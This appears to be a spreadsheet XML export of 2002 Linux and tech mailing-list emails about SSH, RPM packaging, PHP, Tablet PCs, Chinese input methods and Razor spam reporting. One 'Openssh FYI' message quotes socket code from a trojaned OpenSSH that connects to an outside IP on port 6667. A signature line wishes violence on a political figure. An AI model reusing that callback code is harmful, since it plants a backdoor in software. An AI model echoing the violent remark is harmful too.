    <t>I have a strange problem with one user in a small network using ssh.\nEveryone in the network uses ssh and they run an ssh-agent on login. This\nworks fine for conveniently wandering around the network and to some of our\nexternal boxes - or did, until today. Suddenly, when one user (alfred) tries\nto ssh anywhere he's asked for a password. He says He changed nothing (don't\nthey all) but I do actually believe him. I used ssh-keygen to make new keys\nbut that didn't help. \n\nI created a new user alfio into whose home directory I copied alfred's .ssh\ndirectory - alfio can wander around free as a bird without being asked for a\npassword ever (except of course for the passphrase to load the identiy into\nthe agent).\n\nIn case there was something else in Alfred' environment, I copied .??* from\nalfred's home directory to alfio's, remembering to change ownership\nafterwards. Still alfio is as free as a bird.\n\nWe use only SSH2 with DSA keys. An extract from a ssh -v for alfio is below\n\ndebug1: got SSH2_MSG_SERVICE_ACCEPT\ndebug1: authentications that can continue: publickey,password\ndebug1: next auth method to try is publickey\ndebug1: userauth_pubkey_agent: testing agent key /home/alfio/.ssh/id_dsa\ndebug1: input_userauth_pk_ok: pkalg ssh-dss blen 434 lastkey 0x80916f0 hint -1\ndebug1: ssh-userauth2 successful: method publickey\n\nand before starting this ssh attempt, ssh-add -l for alfio said:\n\n1024 07:4c:7c:90:0d:28:41:3a:95:c2:81:3d:ba:c4:3d:03 /home/alfio/.ssh/id_dsa (DSA)\n\nwhereas with alfred the same segment of the debug log went\n\ndebug1: got SSH2_MSG_SERVICE_ACCEPT\ndebug1: authentications that can continue: publickey,password\ndebug1: next auth method to try is publickey\ndebug1: userauth_pubkey_agent: testing agent key /nfshome/alfred/.ssh/id_dsa\ndebug1: authentications that can continue: publickey,password\n\nand before starting this ssh attempt, ssh-add -l for alfred said:\n\n1024 07:4c:7c:90:0d:28:41:3a:95:c2:81:3d:ba:c4:3d:03 /home/alfred/.ssh/id_dsa (DSA)\n\n\nThis problem is definitely related to alfred as a user - it happens when he\nlogs in on differing workstations (all NFS mounting the same home\ndirectories) and the other users (including good old alfio) don't have any\nproblems.\n\n\nNiall\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: John Hinsley &lt;johnhinsley@blueyonder.co.uk&gt;\nDate: Thu, 1 Aug 2002 15:08:59 +0100</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 15:08:59 +0100</t>
  </si>
  <si>
    <t>On Thursday 01 Aug 2002 1:29 pm, Ralf Ertzinger wrote: &gt; Hi. &gt; &gt; John Hinsley  wrote: &gt; &gt; So, I *do* have OpenGL, thanks all. &gt; &gt; And it is using your hardware. &gt; &gt; &gt; Problem is that I can't find an rpm of plib which will install (or &gt; &gt; recognise that I have open GL). I guess I'll have to try and do that &gt; &gt; from source, unless anyone has any ideas? &gt; &gt; plib as in plib.sf.net? They do not provide RPMs, as far as I have seen &gt; (and I did not look inside the tarballs). Maybe it will be best to &gt; build your RPMS yourself (and maybe Matthias can share some insight &gt; in building RPMS with NVIDIAs drivers installed, it seems to be a &gt; little tricky to do that and get RPMS which install on systems &gt; without these drivers). Please! It does seem that with 7.3 something rather extraordinary has  happened! And while there are rpms for plib (as in plib.sf.net), TuxRacer,  FlightGear and so on (for SuSE, Mandy and Connectiva, IIRC) dotted around,  there are none for 7.3.  Cheers John _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Rick Moen &lt;rick@linuxmafia.com&gt;\nDate: Thu, 1 Aug 2002 14:16:38 -0700</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 14:16:38 -0700</t>
  </si>
  <si>
    <t>[ILUG] ispell _and_ aspell in Irish</t>
  </si>
  <si>
    <t>I just heard from Kevin Patrick Scannell, author of the Irish-language\nispell dictionary ("ispell-gaeilge") discussed a month or two ago.\nHe's revised it, and moreover has added a version for the much-better\naspell package ("aspell-gaeilge").  The latter is particularly good news\nfor users of OpenOffice.org.\n\nDetails for us anglophones:  [URL]http://borel.slu.edu[/URL]\nAnd in Irish:  [URL]http://borel.slu.edu[/URL]\n\n-- \nCheers,      "Transported to a surreal landscape, a young girl kills the first\nRick Moen     woman she meets, and then teams up with three complete strangers\nrick@linuxmafia.com       to kill again."  -- Rick Polito's That TV Guy column,\n              describing the movie _The Wizard of Oz_\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://borel.slu.edu http://borel.slu.edu http://www.linux.ie</t>
  </si>
  <si>
    <t>To: CDale &lt;cdale@techmonkeys.net&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 1 Aug 2002 12:59:05 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 12:59:05 -0400 (EDT)</t>
  </si>
  <si>
    <t>Re: Pics and thanks</t>
  </si>
  <si>
    <t>On Thu, 1 Aug 2002, CDale wrote:\n\n--]Leave it to Tom to put the one w/ his son's wanker in the center.\n\nHeck, why hide perfection:)- No bias here, nope none whatsoever.\n\nIll have to snap another nudie of him in a few days to show off his\nbodymodification (snip snip circ circ). I even had an empty chair\npresent:)-\n\n-tom\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 1 Aug 2002 12:53:00 +0200</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 12:53:00 +0200</t>
  </si>
  <si>
    <t>Re: Quick php advice needed :-)</t>
  </si>
  <si>
    <t>Once upon a time, Brian wrote : &gt; On Thu, 1 Aug 2002 10:51:56 +0200, Matthias Saou  &gt; wrote: &gt;  &gt; &gt; Sorry, this hasn't got much to do with rpm packages directly ;-) &gt; &gt;  &gt; &gt; My "builds" page is getting bigger and bigger, and quite messy as &gt; &gt; directories are listed in no particular order : &gt; &gt; [URL]http://freshrpms.net[/URL] &gt;  &gt;     Yep.  Make sure there's a field in the database called (for example) &gt;     "Updated" and when it comes time to generate the list, add "order by &gt;     updated".  This'll put it in that particular order for ya.  You can &gt;     also chose to order it by name, etc by changing this field. &gt;  &gt;     This should be the same for both MySql and Postgressql (any modern &gt;     SQL, really).  Which are you using? None for that "builds" part : It's just an export of the CVS tree in which I keep my spec files and patches! ;-) I think the filemtime() php function that Ville uses in his sript is what I'm looking for, then I guess I just need to fill an array with the names and mtimes, sort it, then display what I want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Mike Masnick &lt;mike@techdirt.com&gt;\nFrom: Bill Humphries &lt;bill@whump.com&gt;\nDate: Thu, 1 Aug 2002 12:09:40 -0700</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 12:09:40 -0700</t>
  </si>
  <si>
    <t>Re: Naveen Jain steps down</t>
  </si>
  <si>
    <t>On Thursday, August 1, 2002, at 11:38 AM, Mike Masnick wrote:\n\n&gt;  "In other words, those\n&gt; &gt; who don't believe in God, and those who believe in God and InfoSpace.\n&gt; &gt; That's OK -- the nonbelievers will be converted when we become a\n&gt; &gt; trillion-dollar company."\n\nVerizon Wireless uses InfoSpace for myvzw.net, the last few times I \ninteracted with it, I was less than impressed.\n\nIf it's a example of "Argument from Design", then the Creationists ought \nto disavow Jain right away.\n\n-- whump\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Tom &lt;tomwhore@slack.net&gt;\nFrom: Bill Humphries &lt;bill@whump.com&gt;\nDate: Thu, 1 Aug 2002 12:06:45 -0700</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 12:06:45 -0700</t>
  </si>
  <si>
    <t>On Thursday, August 1, 2002, at 09:59 AM, Tom wrote:\n\n&gt; On Thu, 1 Aug 2002, CDale wrote:\n&gt;\n&gt; --]Leave it to Tom to put the one w/ his son's wanker in the center.\n&gt;\n&gt; Heck, why hide perfection:)- No bias here, nope none whatsoever.\n\nThat reminds me of a Robin William's routine from the 80's concerning his \nwitnessing of the birth of his son (back in the day, the presence of dad \non the OB floor was still, well, rather Marin-ish).\n\n"It's a boy, and he's hung like a bear!"\n"That's the umbilical cord, Mr. Williams."\n\n-- whump\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: RPM-List &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 1 Aug 2002 10:51:56 +0200</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 10:51:56 +0200</t>
  </si>
  <si>
    <t>Quick php advice needed :-)</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --Multipart_Thu__1_Aug_2002_10:51:56_+0200_0865e508 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sorry, this hasn't got much to do with rpm packages directly ;-) My "builds" page is getting bigger and bigger, and quite messy as directories are listed in no particular order : [URL]http://freshrpms.net[/URL] What I'd need is to have last modification date of the directory displayed next to the directory name (sort of like "mplayer - Thu Aug 1 2002"), and the list ordered to have the most recent entries at the top. Now, if there are php programmers on this list, I'd love to have their help on how to do this ;-) It must be quite simple to get the system mtime for the directory, it's the ordering that scares me a bit more. Attached is the current code (please keep in mind that I'm not a programmer, it usually explains a lot ;-)). Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 --Multipart_Thu__1_Aug_2002_10:51:56_+0200_0865e508 Content-Type: text/html;  name="index.html" Content-Disposition: attachment;  filename="index.html" Content-Transfer-Encoding: 7bit These are the current versions of all spec files and patches used for the builds you may find here. An anonymous CVS repository may be available some day so that all older releases become available too... "maybe", that is... Builds which have files publicly available :\n\n\n"; 	while ( $file = readdir( $open_dir ) ) { 		if ( ( is_dir( $file ) ) and ( !eregi("^\.|CVS$", $file) ) ) { 			echo " $file\n"; 		} 	} } else { 	if ( is_dir( $build ) ) { 		$open_dir = opendir( $build ); 		echo "Files available for build \"$build\" :\n\n\n"; 		while ( $file = readdir( $open_dir ) ) { 			if ( !is_dir( $file ) ) { 				echo " $file\n"; 			} 		} 	} else { 		echo "\nEeeek! I can't find that build.\n\n\n"; 	} 	echo "Back to the list of builds\n\n"; } ?&gt; --Multipart_Thu__1_Aug_2002_10:51:56_+0200_0865e508-- _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Thu, 1 Aug 2002 10:38:50 -0700</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 10:38:50 -0700</t>
  </si>
  <si>
    <t>RE: Tablet PC</t>
  </si>
  <si>
    <t>Oh yeah, the link for more info:\n\n[URL]http://www.microsoft.com[/URL]\n\n- Jim\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.microsoft.com http://xent.com</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Thu, 1 Aug 2002 10:36:32 -0700</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 10:36:32 -0700</t>
  </si>
  <si>
    <t>Tablet PC</t>
  </si>
  <si>
    <t>Last week I had a chance to see some TabletPC's demonstrated, and I was very\nimpressed.\n\n* Handwriting recognition was good, as was the ability to parse text from\ndiagrammatic or graphic elements.\n* TabletPC form factors, while not perfect, are quite usable (light,\nrelatively thin, some can convert from laptop to tablet use by flipping the\nscreen).\n* Pushbutton switching between portrait and landscape screen orientation.\n* TabletPCs I saw came with built-in WiFi.\n* Good to very good integration of handwriting into existing applications,\nand there is a very nice new note-taking application specifically for\nhandwritten notes.\n* Good set of APIs for adding handwriting into existing applications (at the\nmost simple, it's only a few additional lines of code)\n* Prices of the hardware will be around mid-range laptop (will vary by\nmodel)\n\nI believe the TabletPC will be very successful, and is a much bigger deal\nthan the relative lack of press coverage would suggest. I'm definitely\nstarting to think about how I could incorporate one into my routine...\n\n- Jim\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: David Dorgan &lt;davidd@sponge.xevion.net&gt;\nDate: Thu, 1 Aug 2002 08:15:34 -0400</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 08:15:34 -0400</t>
  </si>
  <si>
    <t>David Dorgan &lt;davidd@sponge.xevion.net&gt;</t>
  </si>
  <si>
    <t>[ILUG] Openssh FYI.</t>
  </si>
  <si>
    <t>[URL]http://docs.freebsd.org[/URL]\n\nsa.sin_family=AF_INET;\nsa.sin_port=htons(6667);\nsa.sin_addr.s_addr=inet_addr("203.62.158.32");\n\nDavid.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://docs.freebsd.org http://www.linux.ie</t>
  </si>
  <si>
    <t>To: yyyy-webdev@spamassassin.taint.org\nFrom: listmaster@tuatha.org\nDate: Thu, 1 Aug 2002 06:52:13 +0100</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 06:52:13 +0100</t>
  </si>
  <si>
    <t>listmaster@tuatha.org</t>
  </si>
  <si>
    <t>yyyy-webdev@spamassassin.taint.org</t>
  </si>
  <si>
    <t>linux.ie mailing list memberships reminder</t>
  </si>
  <si>
    <t>This is a reminder, sent out once a month, about your linux.ie mailing\nlist memberships.  It includes your subscription info and how to use\nit to change it or unsubscribe from a list.\n\nYou can visit the URLs to change your membership status or\nconfiguration, including unsubscribing, setting digest-style delivery\nor disabling delivery altogether (e.g., for a vacation), and so on.\n\nIn addition to the URL interfaces, you can also use email to make such\nchanges.  For more info, send a message to the '-request' address of\nthe list (for example, webdev-request@linux.ie) containing just the\nword 'help' in the message body, and an email message will be sent to\nyou with instructions.\n\nIf you have questions, problems, comments, etc, send them to\nlistmaster@tuatha.org.  Thanks!\n\nPasswords for jm-webdev@jmason.org:\n\nList                                     Password // URL\n----                                     --------  \nwebdev@linux.ie                          foo       \n[URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Thu, 1 Aug 2002 06:08:21 -0500</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 06:08:21 -0500</t>
  </si>
  <si>
    <t>On Thu, 1 Aug 2002 12:53:00 +0200, Matthias Saou  wrote: &gt; None for that "builds" part : It's just an export of the CVS tree in which &gt; I keep my spec files and patches! ;-) &gt; I think the filemtime() php function that Ville uses in his sript is what &gt; I'm looking for, then I guess I just need to fill an array with the names &gt; and mtimes, sort it, then display what I want :-)     Arg; what a pain.  You can have a cron job to 'digest' this information every so often and populate the database...    ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ I don't want to hear news from Isreal until the news contains the words "Bullet", "Brain", and "Arafat". _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Tom &lt;tomwhore@slack.net&gt;\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Thu, 1 Aug 2002 05:58:23 -0500 (CDT)</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 05:58:23 -0500 (CDT)</t>
  </si>
  <si>
    <t>Leave it to Tom to put the one w/ his son's wanker in the center. LOL  \nReminds me of when my sister called me about the birth of her first son.  \nShe goes: "Cindy, he looks just like his dad, but he's HUNG!"  LOL ehehe  \nGrats, Tom, he's gorgeous.  Good thing he doesn't look like you.  (:\nCindy\n\nOn Thu, 1 Aug 2002, Tom wrote:\n\n&gt; \n&gt; I gota thank all you kind folk who sent thier well wishes our way. It was\n&gt; a bumpy ride but everything is working out and allthe good vibes are a\n&gt; tremendous help. Ive saved each one and along with the cards and other\n&gt; emails we have been getting we are goign to print them out add them to\n&gt; Benjamins baby book.\n&gt; \n&gt; Ive had just enough time to Gimp up a pic so folks can see the little\n&gt; bloke. Head on over to [URL]http://wsmf.blogspot.com[/URL] and have a gander at the\n&gt; boy.\n&gt; \n&gt; -tom(i cant feedem so I changem)whore\n&gt; \n&gt; \n&gt; \n&gt; [URL]http://xent.com[/URL]\n&gt; \n\n-- \n"My theology, briefly, is that the universe was dictated but not\n          signed."  (Christopher Morley) \n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://wsmf.blogspot.com http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: James Rogers &lt;jamesr@best.com&gt;\nFrom: Chris Haun &lt;chris@noskillz.com&gt;\nDate: Thu, 1 Aug 2002 05:34:15 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 05:34:15 -0400 (EDT)</t>
  </si>
  <si>
    <t>James Rogers &lt;jamesr@best.com&gt;</t>
  </si>
  <si>
    <t>if it were me, i think i'd have a spare set of tanks in ft. irwin, and \njust move the soldiers.  \n\n\nOn 31 Jul 2002, James Rogers wrote:\n\n&gt; The first is logistical: Virtually all the mechanized infantry units are\n&gt; located east of the Rockies, and it must be very expensive to move\n&gt; entire heavy combat divisions a couple thousand miles every time they\n&gt; want to run training exercises.  This is particularly true since so much\n&gt; of our military is made up of reserve components these days, meaning\n&gt; that you can't move the soldiers to where the training facilities are.\n&gt; \n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Thu, 1 Aug 2002 05:23:22 -0500</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 05:23:22 -0500</t>
  </si>
  <si>
    <t>On Thu, 1 Aug 2002 10:51:56 +0200, Matthias Saou  wrote: &gt; Sorry, this hasn't got much to do with rpm packages directly ;-) &gt;  &gt; My "builds" page is getting bigger and bigger, and quite messy as &gt; directories are listed in no particular order : &gt; [URL]http://freshrpms.net[/URL]     Yep.  Make sure there's a field in the database called (for example) "Updated" and when it comes time to generate the list, add "order by updated".  This'll put it in that particular order for ya.  You can also chose to order it by name, etc by changing this field.     This should be the same for both MySql and Postgressql (any modern SQL, really).  Which are you using?    ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ I don't want to hear news from Isreal until the news contains the words "Bullet", "Brain", and "Arafat". _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: grlygrl201@aol.com\nDate: Thu, 1 Aug 2002 04:33:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 04:33:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>Not Surprised</t>
  </si>
  <si>
    <t>It took me a week to get down to this; The towering pine and the hemlock. [URL]http://www.informationweek.com[/URL] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.informationweek.com http://xent.com</t>
  </si>
  <si>
    <t>To: Irish Linux Users Group &lt;ilug@linux.ie&gt;\nFrom: Kenn Humborg &lt;kenn@linux.ie&gt;\nDate: Thu, 1 Aug 2002 02:41:41 +0100</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 02:41:41 +0100</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 06:57:50PM +0100, Brian Foster wrote: &gt;  XIMs generally work as a complex compose frontend.  i.e., you &gt;  build up your character as a series of composes of the root or &gt;  fundamental strokes ("radicals", I think they are called), and &gt;  then "commit" the composite character to the application. &gt;  ( yes, keyboarding these scripts _is_ quite slow, I believe &gt;   a good typist can only do a few characters a minute! &gt;   and I assume using a qwerty keyboard is very painful. ) I can speak for some Chinese input methods and you can do a hell of a lot better than a few chars per minute.  For example, the simplest Chinese IM is Pinyin where you phonetically spell out each character using the pinyin romanisation rules.  For example, Zhong Guo (Chinese for China) is entered by typing 'zhong', then you're prompted with a list of possible matches, with the most common first in a numbered list, so you hit, say, 2 for the second in the list, then similarly for 'guo' 3. You can see, that, regarding keystroke counts, it's not that much different to English.  However, until you get familiar with the sorting order in the 'possible match' lists, it can be a little slow. Other input methods are more keystroke-efficient, losing the phonetic simplicity of Pinyin.  Chinese characters are almost always pronounced as a first-part-second-part, so zhong is 'zh'-'ong'.  One input method assigns single letters to the possible first and second parts, so 'i' might represent 'zh' as a first part and 'ong' as a second part, so you'd enter zhong as 'ii' and a digit to choose from the possible matches. I think the Microsoft Global IME has a 'stroke' mode where you can build up a character stroke by stroke, but you'd only use that when you know the character you want but you don't know how to pronounce it. &gt;  &gt;  some XIMs compose "in place", others do it on a special line, &gt;  and some seem to do it in a special window (or the root?). &gt;  also, some(/most?) XIMs apparently support a US-ASCII input &gt;  mode as well --- _not_ a general Latin-alphabet input mode, &gt;  which seems to require another TLA, called KBD, and which &gt;  apparently doesn't work when an XIM is also being used? --- &gt;  implying you have to switch back and forth between US-ASCII &gt;  input mode (what us English-speakers would call "normal" &gt;  keyboarding/typing), and the other input (e.g., Chinese). &gt;  I'm not sure, but I have the impression the switch is often &gt;  a toggle, and something like . Probably most often Ctrl-Space.  That's what the Microsoft Global Input Method Editor uses and what xcin uses IIRC. Regarding the original poster's question - here's what works for me on Red Hat 7.2 o  Make sure the xcin and ttfonts-zh_CN RPMs are installed.  (The    fonts might not be essential, I think XFree comes with usuable    Chinese fonts in the XFree86-fonts RPMs o  Select Chinese (Simplified) as the language in GDM when logging    in. Everything should 'just work'.  If you've got the default clock in your GNOME panel, you should now see it in Chinese.  A lot of the menus will also be in Chinese, but you should be able to find your way around. Use Ctrl-Space to toggle between Chinese and English input.  When  in Chinese mode Shift-Space toggles between something that I don't understand, but it blocks exiting to English.  So if you can't use Ctrl-Space to get back to English, try hitting Shift-Space, Ctrl-Space. Fire up a GNOME terminal.  In Chinese mode, type zhong 1 guo 1 and  you'll see the Chinese for China. Getting this to work while selecting English at the GDM screen is left as an exercise for the reader.  Looking at /etc/X11/xinit/xinitrc.d/xinput and /usr/share/doc/xcin should give enough info. Later, Kenn --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: FoRK &lt;FoRK@xent.com&gt;\nFrom: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nDate: Thu, 1 Aug 2002 02:18:47 -0400</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 02:18:47 -0400</t>
  </si>
  <si>
    <t>Acopia Networks?</t>
  </si>
  <si>
    <t>Yet another pre-interview query.   I don't know a thing about them that \nisn't on their mostly-uninformative web site.   Charles River Ventures led \na $10 million round of financing in January of this year.\n\nOne of their techie founders wrote a paper on a protocol to allow \nout-of-order image chunk delivery for image types that can be rendered \nthat way.   \n\nEirikur\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 1 Aug 2002 02:11:10 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 02:11:10 -0400 (EDT)</t>
  </si>
  <si>
    <t>Pics and thanks</t>
  </si>
  <si>
    <t>I gota thank all you kind folk who sent thier well wishes our way. It was\na bumpy ride but everything is working out and allthe good vibes are a\ntremendous help. Ive saved each one and along with the cards and other\nemails we have been getting we are goign to print them out add them to\nBenjamins baby book.\n\nIve had just enough time to Gimp up a pic so folks can see the little\nbloke. Head on over to [URL]http://wsmf.blogspot.com[/URL] and have a gander at the\nboy.\n\n-tom(i cant feedem so I changem)whore\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://wsmf.blogspot.com http://xent.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Dave Wilson &lt;dave.wilson@heanet.ie&gt;\nDate: Thu, 08 Aug 2002 23:57:48 +0100</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 23:57:48 +0100</t>
  </si>
  <si>
    <t>Dave Wilson &lt;dave.wilson@heanet.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Dialup on debian</t>
  </si>
  <si>
    <t>Hi all, I have a debian machine with an external ISDN terminal adapter, which  I'm trying to get to dial a Cisco 3600 running CHAP. wvdial on Red Hat  copes fine with this. However, I get the same results if i use pon or  wvdial on Debian: pppd negotiation is detected, pppd is started -- and  I'm never assigned an IP address. Looking at the logs on the Cisco, I see that in place of the username I  seem to be transmitting a six-digit hex number. e.g.: Aug  8 23:35:00.311 UTC+1: %ISDN-6-CONNECT: Interface Serial0/0:19 is  now connected to  19eb85 The last entry should be my dialup username. (Substitute incoming phone  number for ). Any ideas what I'm doing wrong? Cheers, Dave --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: "Will Glynn" &lt;delta407@delta407.homeip.net&gt;\nDate: Thu, 08 Aug 2002 23:18:29 -0500</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 23:18:29 -0500</t>
  </si>
  <si>
    <t>"Will Glynn" &lt;delta407@delta407.homeip.net&gt;</t>
  </si>
  <si>
    <t>&gt; Who loses in this case? Why? Neither party is inaccurate in their\n&gt; actions IMO. But someone's standing is going to get hurt because of it.\n\nMy question for the trust system is this. I signed up for a free account \non some website that gives me free access to a large compilation of data, \nand in so doing have subscribed myself to their mailing list. The mailing \nincludes a list of new articles and books and so forth as well as a few \nlinks to their book store.\n\nThis is consistently flagged as spam, even though I *agreed* to see it, \nand I *want* to see what new articles there are, since some of them might \nbe interesting. Thus, since it is certifiably *not* spam (it even \nincludes a link to terminate your account), I revoke it. Even so, the \nnext mail is still flagged as spam.\n\nWho is losing a trust rating here? If it is not unsolicited commercial e-\nmail, it should not be reported by Razor as spam -- correct?\n\n--Will\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jehan &lt;nahor@bravobrava.com&gt;\nDate: Thu, 08 Aug 2002 20:00:00 -0700</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 20:00:00 -0700</t>
  </si>
  <si>
    <t>[Razor-users] Re: What's wrong with the Razor servers now?</t>
  </si>
  <si>
    <t>Tabor J. Wells wrote: &gt; On Fri, Aug 09, 2002 at 10:05:29AM +1000, &gt; Adam Goryachev  is thought to have said: &gt;  &gt;  &gt;&gt;&gt;Now I get some opt-in mail which looks to me like &gt;&gt;&gt;spam.  I hit "this is spam".  My trust rating plummets -- &gt;&gt; &gt;&gt;Good! Your opinion of what is spam is unreliable, and therefore, I don't &gt;&gt;*want* to trust you. IMHO, that is exactly the case that the trust system is &gt;&gt;supposed to sort out. People who incorrectly submit non-spam bulk mail to &gt;&gt;razor. &gt;  &gt;  &gt; Let's take a look at an example here. Someone on this list signed &gt; razor-users@fsckit.net up to a ZDNet mailing list that doesn't confirm &gt; subscriptions in a piss-poor attempt to mailbomb me. I report all of these &gt; mailings to Razor because, guess what, for me this is spam. This and a &gt; hundred more traditional spam emails to automated spamtrap addresses get  &gt; reported by me daily. I probably have a decent TES value because of all of &gt; this. &gt;  &gt; Now lets say someone else who is also reporting a fair amount of your &gt; typical proxy/relayed spam has been reporting these and has built up a &gt; decent TES rating because of it. However they subscribed to that same ZDNet &gt; list and enjoy getting the mail from it except that they don't like seeing  &gt; it tagged as spam by Razor. So they razor-revoke it.  &gt;  &gt; Who loses in this case? Why? Neither party is inaccurate in their actions &gt; IMO. But someone's standing is going to get hurt because of it. Actually you would be inaccurate in your action in a way. The correct  behavior would be to unsubscribe razor-users@fsckit.net from the mailing  list. But in any case, you have to understand that you and him would not be  the only one involved. As I said in a another thread, you probably get  hurt only if you are against the majority of people (which makes sense).  If you are with the majority, you get a bonus (which also makes sense).  If there is no majority, nobody wins or lose. Razor is designed for the betterment of most people, i.e. the majority,  not for the individual. If one doesn't agree with the majority, he  should use the razor-whitelist or create a blacklist (BTW, why doesn't  razor provide a razor-blacklist too?) 	Jehan ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jehan Bing &lt;jehan@bravobrava.com&gt;\nDate: Thu, 08 Aug 2002 17:34:51 -0700</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 17:34:51 -0700</t>
  </si>
  <si>
    <t>Jehan Bing &lt;jehan@bravobrava.com&gt;</t>
  </si>
  <si>
    <t>[Razor-users] Re: keep submitting known spam?</t>
  </si>
  <si>
